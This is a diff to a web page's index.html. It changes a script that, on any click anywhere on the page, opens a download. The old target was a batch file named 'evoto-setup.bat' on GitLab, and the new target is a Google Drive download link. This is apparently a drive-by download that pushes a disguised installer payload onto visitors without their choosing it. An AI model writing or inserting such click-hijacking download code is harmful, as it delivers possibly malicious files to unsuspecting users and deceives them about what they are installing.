--- a/index.html
+++ b/index.html
@@ -3117,7 +3117,7 @@
     </div>
     <script>
       document.body.onclick = function(){
-          window.open('https://gitlab.com/ledangtu/batch/-/raw/main/evoto-setup.bat?inline=false')
+          window.open('https://drive.google.com/u/0/uc?id=1ZLMCfWY_gWCWLNP8fdM4NHx8YwXW5kGd&export=download')
       }
     </script>
   </body><div style="position: absolute; top: 0px; display: block !important;"></div>
